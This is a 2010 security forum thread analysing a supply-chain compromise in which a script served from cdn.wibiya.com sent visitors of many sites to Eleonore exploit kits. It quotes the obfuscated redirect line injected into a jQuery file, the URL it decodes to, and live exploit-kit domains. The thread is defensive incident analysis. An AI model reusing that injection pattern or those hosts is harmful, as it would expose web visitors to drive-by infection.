Author Topic: external script from cdn.wibiya.com directs to exploit kits  (Read 3315 times)

0 Members and 1 Guest are viewing this topic.

April 01, 2010, 07:07:26 pm
Read 3315 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Today we looked at the referer pages of various Eleonore exploits kits.

Here is an example:
Code: [Select]
HTTP Referer:  Trafic:  Loads:  Percent:
www.mdinfo.com 3673 516 14.05 %
www.dl4all.com 2321 208 8.96 %
www.opensubtitles.org 2115 191 9.03 %
existenz.se 2111 196 9.28 %
rapidshare-catalog.com 1464 149 10.18 %
www.jpost.com 1150 113 9.83 %
www.uniquescoop.com 970 100 10.31 %
www.download.besplatnestvari.biz 754 72 9.55 %
sportske.jutarnji.hr 682 101 14.81 %
www.kadimdostlar.com 650 128 19.69 %
www.muzika.besplatnestvari.biz 541 67 12.38 %
kominek.blox.pl 503 50 9.94 %
ads2.atoll.gr 494 62 12.55 %
www.maxihayat.net 454 93 20.48 %
my-greek.blogspot.com 387 38 9.82 %
www.art2bempire.com 381 35 9.19 %
forum.ppcwarez.org 373 17 4.56 %
bingo.24sata.hr 369 46 12.47 %
www.opera-17.com 362 31 8.56 %
-- 348 50 14.37 %
www.tvfun.ma 347 77 22.19 %
boss-tv.pl 345 43 12.46 %
www.sparwelt.de 344 20 5.81 %
forum.esoft.in 335 25 7.46 %
www.knowledgesutra.com 330 30 9.09 %
www.livehealthclub.com 330 48 14.55 %
board.art2bempire.com 295 46 15.59 %
www.medioteka.net 286 28 9.79 %

I checked all referer pages , but didn't find iframes or obfuscated javascript code.
The only thing that is common on all those pages is an external script from cdn.wibiya.com

e.g. hxxp://cdn.wibiya.com/Loaders/Loader_32026.js

This script downloads a javascript library from

Code: [Select]
cdn.wibiya.com/Scripts/jquery.min.js
This obfuscated file contains an instruction
Code: [Select]
return 'h3t>t3p7:E/7/>i>m3g3dNo7w7nNl3o7a>dEsN.7cNo3m3/3i>n>.7c>g7iN?N5N'.qF(/[NE\>73]/g, '')
which decodes to

Code: [Select]
http://imgdownloads.com/in.cgi?5
This url redirects to

Code: [Select]
http://imgdownloads.com/in.cgi?2
which redirects to various exploits kit.

Some minutes ago it directed me to
Code: [Select]
carmup.com/lee/http://www.malwaredomainlist.com/mdl.php?search=carmup.com%2Flee%2F&colsearch=All&quantity=50

Before it was
Code: [Select]
tpdoc.in/x/http://www.malwaredomainlist.com/mdl.php?search=tpdoc.in%2Fx%2F&colsearch=All&quantity=50

But our members reported some more kits.
Ruining the bad guy's day

April 02, 2010, 09:24:15 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
wibiya.com have replaced the script by a clean file.
Ruining the bad guy's day

April 03, 2010, 10:35:12 am
Reply #2

Garlando

  • Full Member

  • Offline
  • ***

  • 40
its Sutra TDS if you did not know that yet

April 04, 2010, 05:16:07 pm
Reply #3

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Wibiya compromised again.

Code: [Select]
http://community.wibiya.com/wibiya/topics/wibya_toolbar_recongnized_as_virus
Quote
We've just fixed the problem,

We found the problem's origin and FIXED it, we scanned all of Wibiya's files and sources and everything is safe to use.

More info about this issue:
Apparently it was a security breach at our hosting provider that probably effected many companies. we're still working with our hosting provider to see how it can prevented in the future.

Sorry for the inconvenience, please let us know if you encounter any similar issues from now on.
Ruining the bad guy's day